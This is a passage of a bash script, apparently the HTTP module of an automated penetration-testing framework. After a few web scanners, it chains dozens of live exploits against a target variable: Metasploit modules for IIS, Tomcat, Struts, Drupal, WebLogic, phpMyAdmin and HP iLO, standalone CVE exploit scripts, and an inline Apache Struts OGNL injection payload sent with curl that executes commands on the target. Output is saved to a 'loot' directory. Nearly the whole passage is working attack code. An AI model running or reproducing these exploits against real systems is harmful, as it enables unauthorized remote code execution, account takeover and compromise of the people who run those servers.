clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
|
||||
fi
|
||||
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET
|
||||
fi
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port80-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
